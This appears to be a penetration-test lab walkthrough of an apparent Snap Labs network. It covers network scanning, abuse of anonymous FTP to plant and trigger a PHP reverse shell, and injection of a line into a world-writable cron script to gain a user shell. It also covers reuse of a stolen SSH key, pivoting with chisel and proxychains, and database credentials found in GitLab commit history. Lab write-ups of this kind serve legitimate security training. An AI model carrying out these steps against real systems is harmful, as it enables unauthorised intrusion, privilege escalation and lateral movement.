After we have downloaded our vpn file we can vpn into the network
First i want to scan the Esge network and see if i can gain a foothold on one of the edge machines
sudo nmap -sCV 10.10.0.0/24 -oA edge_machines
results
10.10.0.4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a0:3e:31:d7:16:fe:28:78:8b:5b:90:72:42:e5:67:a4 (RSA)
| 256 56:09:1f:b0:b1:88:47:01:e4:5a:4d:c1:89:13:60:1f (ECDSA)
|_ 256 d9:74:e4:6f:05:49:54:d3:ec:ed:7a:1c:b4:76:1d:c4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=33e9fb8d175421613fb4.access-snaplabs.io
| Subject Alternative Name: DNS:33e9fb8d175421613fb4.access-snaplabs.io
| Not valid before: 2024-01-10T00:00:00
|_Not valid after: 2024-04-09T23:59:59
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Ubuntu machine
HTTP and HTTPS web server Apache 2.4.41
SSH
10.10.0.103
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.0.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 10918 Jul 25 2021 index.html
|_drwxrwxrwx 2 0 0 4096 Jul 25 2021 temp [NSE: writeable]
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ab:8f:b8:06:41:f2:dd:92:cd:c4:92:60:53:d4:cf:2e (RSA)
| 256 ac:96:0a:75:d0:88:ca:16:87:5f:7d:5b:a4:6f:cd:9e (ECDSA)
|_ 256 5e:ce:7a:e3:90:9e:dd:a7:4d:24:0f:8e:a3:d7:23:07 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
443/tcp open ssl/http nginx
| ssl-cert: Subject: commonName=10.10.0.103
| Not valid before: 2021-07-17T14:19:12
|_Not valid after: 2021-08-16T14:19:12
| http-robots.txt: 54 disallowed entries (15 shown)
| / /autocomplete/users /autocomplete/projects /search
| /admin /profile /dashboard /users /help /s/ /-/profile /-/ide/
|_/*/new /*/edit /*/raw
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was https://10.10.0.103/users/sign_in
|_ssl-date: TLS randomness does not represent time
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
FTP (anonymous access allowed
SSH
HTTP and HTTPS
we can see the robots.txt
10.10.0.181
Nmap scan report for 10.10.0.181
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c3:a6:3b:dc:4a:19:ba:d3:97:ce:7f:d3:df:af:da:df (RSA)
| 256 5e:9f:ee:d8:c8:5a:42:95:96:27:39:61:58:94:a6:d8 (ECDSA)
|_ 256 88:4d:51:17:06:bd:d2:8b:d7:3e:3c:79:7d:d5:38:95 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 126.05 seconds
SSH
HTTP web server
Letts scan all ports on targets to see if we are missing anything
the only new Ports we have found was for host 10.10.0.103
results
Nmap scan report for 10.10.0.103
Host is up (0.24s latency).
Not shown: 65486 closed tcp ports (reset), 43 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
443/tcp open https
8060/tcp open aero
9094/tcp open unknown
10.10.0.103
Looking through the output we can see machine 10.10.0.103 allows for anonymous FTP access, seems like a good place to start
ftp anonymous@10.10.0.103
listing the contents we can find the following
include in report, anonymous access via FTP
we can see we have read access to the index.html
and we have rwx privileges within the temp directory
Looking in the directory we can see anything
Lets checkout the webserver and see if it is connected in some way to the ftp server
we can the default Apache installation page
we can confirm this is indeed ubuntu
this is concerning, we have anonymous access to the root directory of the web server via FTP
Lets checkout HTTPS
we can see a Gitlab application
Not much here
I want to test, if we can upload a php reverse-shell to the ftp's temp directory and trigger it in the url
copy our php reverse-shell into our working directory
navigate to http://10.10.0.103/temp/rev.php , if we look back at our listener we should have a shell on 10.10.0.103
we have our 1st shell woohooo
Lets enumerate the other web server and come back
HOST 10.10.0.181
when we click on "show me the goods" we can see the following
Looks like PHP syntax (given the get_repos.php?), it is an array with the following key-value pairs
name: Looks like a possible web directory, project or role website-dev
author: The author of the website is "brandon"
access: the level of access is set to public
Lets check this url out and see if we can find anything interesting
Looks like we access to that gitlab server we found earlier
Add to report (Sensitive information expsoure)
noothing interesting in these files lets check the commit history
Checking through the commits we do find something interesting
Looks like we have a set of creds, for the host 10.10.1.111 Database gitlab, could be reusable
sa: VeryVeryVerySecure1!
sensitive information exposure
within the internal subnet
try anywhere we can
host 10.10.0.103
Lets see if we can access the gitlab server using these credentials
No luck
host 10.10.0.103 WEB-2 shell as www-data
Alright now we have our initial foothold within one of the external servers, lets get to know our landscape
Lets upgrade our current shell, since this is an ubuntu server python3 should already be installed so
python3 -c "import pty;pty.spawn('/bin/bash')"
first i want to find any creds, keys anything to up escalate our privileges
we need to find what users are on the system
cat /etc/passwd
we do find one user on the system
Lets see if we can find anything within the user brandon's home directory
ls -al /home/brandon
we do see a .ssh directory, lets see if we can find any private keys
we do not have permission yet, Lets see if we can su users and use the credentails we found ealier during the git commits
no luck
Lets download linpeas.sh onto WEB2 and see if we can find anything interesting
copy linpeas to working directory
cp /opt/linpeas/linpeas.sh ./
start a python3 server
python3 -m http.server 80
from our shell on WEB2 lets download the script within the /tmp directory
wget http://10.9.254.6/linpeas.sh
lets run the script
bash ./linpeas.sh > linpeas.output
i personally like saving linpeas to a output file, easier to reference later on
Lets start a python http server on WEB2 so we can download our linpeas.output file
python3 -m http.server 9000
Lets download it to our local host
wget http://10.10.0.103:9000/linpeas.output
we do find something interesting happening in the cron.d directory
cd /etc/cron.d
we can see a cron job that isnt defualt
we can see the user brandon is executing the /etc/log-time.sh script, lets see what permissions we have on the script
ls -al /etc/log-time.sh
we can see the permissions for everyone is read, write, execute, meaning we should be able to drop a bash reverse-shell in the script, and when executed we should gain a shell as the user brandon
Lets reuse our rev.php script, we will change the port number to another in my case port 9010
start a python server
python3 -m http.server 80
download our rev1.php to our /tmp directory
cd /tmp
wget http://10.9.254.6/rev1.php
now we want to append the the log-time.sh script, to run our PHP script
echo "php /tmp/rev1.php" >> /etc/log-time.sh
now we just need to wait for the cronjob to execute and we should have a hit on our listener
Note i was having problems executing our rev1.php so i decided to reuse the rev.php we place in the /var/www/html/temp/ directory
Lets copy this to our nlocal hosts and ssh into the machine
give it the neccasary permissions
chmod 600 id_rsa
Lets see if we can authenticate to WEB2
ssh -i id_rsa brandon@10.10.0.103
we now have SSH access to WEB2 machine
Lets start branching out to other devices on the network
checking the networking interface within WEB2
HOST 10.10.0.181 WEB1
Lets see if we can SSH into 10.10.0.181 using brandon's private key
ssh -i id_rsa brandon@10.10.0.181
woohoo we can
Lets check if there are any other users on the box
cat /etc/passwd
no other users
Lets run linpeas and see if we can find anything
we should still have our python server up so we can
cd /tmp
wget http://10.9.254.6/linpeas.sh
bash ./linpeas.sh > WEB1LP.output
Lets downbload the linpeas output file
start a python server on WEB1
python3 -m http.server 9000
download the output file to our local machine
wget http://10.10.0.181:9000/WEB1LP.output
not alot to go with will review later
Now we have access to both WEB1 and WEB2 external servers, we need to find a way to start pivoting into the internal servers located in the 10.10.1.0/24 subnet
we need to find the IP address of the internal hosts (if we are not looking in our snap lab)
we can write a quick bash script to scan the internal subnet
for i in {1..255}; do (ping -c 1 10.10.1.${i} | grep "bytes from" &); done
save this to a .sh file and upload it to the WEB1 host using a python server and wget
i want to perform some port scanning on the internal servers, or atleast identify any open ports
Lets utilze chisel
clone the repo
git clone https://github.com/jpillora/chisel.git
within the chisel directory we want to run go build
within /chisel/executables/linux we will find the executable, i like to change the file name for ease of typing
mv chisel_1.9.1_linux_amd64 ch.sh
Lets upload it to WEB1, your python server should still be up and running
#WEB1
wget http://10.9.254.6/ch.sh
First we want to set up the chisel server on our local machine
./ch.sh server -p 9010 --reverse
-p: allows us to specify what port chisel listens on
--reverse: tell the server (us) that we want clients connecting in to be allowed to define reverse tunnels, essentially meaning clients connecting can open listening ports on our local machine
Now the client (WEB1) since we have already transfered the ch.sh (chisel) the basic syntax includes
./ch.sh client <serverip (our local machine ip)>:<server port (our local machine port) <remote string> <optional more remote strings>
./ch.sh client 10.9.254.6:9001 R:1080:socks
looking back at our local machine we should see a connection
Now we can configure our proxychaines file to route through chisel
We need to configure our proxychains.conf file
sudo vi /etc/proxychains.conf
we need to create an entry pointing to our local host and port 9010
Now we should be able to proxy our nmap scan through proxychaines and chisel
Now we should be able to run nmap scan's (on particular ports), since we know the there is a connection to a database, and we know there is a windows Domain Controller most likely mssql which the default port is 1433
sudo nmap -p 1433 -Pn 10.10.1.111
we are having problems with nmap going through sshuttle
we know it is connected to the database, we should be able to connect
for this we will use impackets mssqlclient,py
Lets try chisel again
Lets create a socks proxy to we can proxy through 10.10.0.181 into the internal subnet of 10.10.1.0/16
